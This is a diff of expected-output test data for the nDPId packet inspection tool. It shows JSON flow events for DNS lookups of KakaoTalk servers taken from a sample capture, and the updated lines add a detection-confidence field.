 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1430069022104,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"ts_msec":1430069022104,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEBI4YANQAt2SeQlQEAAAEAAAAAAAAEdXAtdgR0YWxrBWtha2FvA2NvbQAAAQAB"}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022104,"flow_last_seen":1430069022104,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022104,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-v.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022104,"flow_last_seen":1430069022104,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022104,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-v.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022105,"flow_last_seen":1430069022105,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022105,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1430069022105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"ts_msec":1430069022105,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEB3fQANQAtU9dudwEAAAEAAAAAAAAEdXAtYwR0YWxrBWtha2FvA2NvbQAAAQAB"}
-00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022105,"flow_last_seen":1430069022105,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022105,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-c.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022105,"flow_last_seen":1430069022105,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022105,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-c.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1430069022234,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":124,"pkt_l4_len":88,"ts_msec":1430069022234,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGwb1gAANREBGwq8AQEKGFK8ADUXKQBYAAol7IGAAAEAAgAAAAAEdXAtcAR0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAFlQAPBHVwLXAEdGFsawJnbMAWwDEAAQABAAAAiwAE0mfwEA=="}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022100,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-p.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022100,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-p.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}}
 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1430069022234,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":124,"pkt_l4_len":88,"ts_msec":1430069022234,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGwb1wAANREBGgq8AQEKGFK8ADUjhgBYgN2QlYGAAAEAAgAAAAAEdXAtdgR0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAFlwAPBHVwLXYEdGFsawJnbMAWwDEAAQABAAAAqwAE0mfwEA=="}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022104,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-v.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022104,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-v.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}}
 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1430069022234,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":124,"pkt_l4_len":88,"ts_msec":1430069022234,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGztegAANREvdgq8AQEKGFK8ADXd9ABYZqtud4GAAAEAAgAAAAAEdXAtYwR0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAD8wAPBHVwLWMEdGFsawJnbMAWwDEAAQABAAAAeAAEbkyNVQ=="}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022105,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-c.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.85"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022105,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-c.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.85"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022249,"flow_last_seen":1430069022249,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022249,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1430069022249,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"ts_msec":1430069022249,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEBcWUANQAtiQin1QEAAAEAAAAAAAAEdXAtYQR0YWxrBWtha2FvA2NvbQAAAQAB"}
-00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022249,"flow_last_seen":1430069022249,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022249,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-a.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022249,"flow_last_seen":1430069022249,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022249,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-a.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1430069022252,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":82,"pkt_l4_len":46,"ts_msec":1430069022252,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEIAAEAAQBHSGgoYUrwKvAEBYh0ANQAu\/udwlQEAAAEAAAAAAAAFdXAtZ3AEdGFsawVrYWthbwNjb20AAAEAAQ=="}
-00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-gp.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-gp.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1430069022252,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"ts_msec":1430069022252,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEBqEUANQAtOYa3iAEAAAEAAAAAAAAEZG4tbAR0YWxrBWtha2FvA2NvbQAAAQAB"}
-00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"dn-l.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"dn-l.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1430069022282,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":124,"pkt_l4_len":88,"ts_msec":1430069022282,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGwb2AAANREBGQq8AQEKGFK8ADVxZQBYBjqn1YGAAAEAAgAAAAAEdXAtYQR0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAFwgAPBHVwLWEEdGFsawJnbMAWwDEAAQABAAAARAAE0mfwEA=="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022249,"flow_last_seen":1430069022282,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069022282,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-a.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022249,"flow_last_seen":1430069022282,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069022282,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-a.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1430069022295,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":97,"pkt_l4_len":61,"ts_msec":1430069022295,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAFHtewAANREvkAq8AQEKGFK8ADWoRQA9yiS3iIGAAAEAAQAAAAAEZG4tbAR0YWxrBWtha2FvA2NvbQAAAQABwAwAAQABAAAEOQAEbkyNVg=="}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"dn-l.talk.kakao.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.86"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"dn-l.talk.kakao.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.86"}}
 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1430069022295,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":126,"pkt_l4_len":90,"ts_msec":1430069022295,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAG4b2QAANREBFgq8AQEKGFK8ADViHQBaJnpwlYGAAAEAAgAAAAAFdXAtZ3AEdGFsawVrYWthbwNjb20AAAEAAcAMAAUAAQAABasAEAV1cC1ncAR0YWxrAmdswBfAMgABAAEAAACsAARuTI0a"}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-gp.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.26"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-gp.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.26"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022297,"flow_last_seen":1430069022297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1430069022297,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
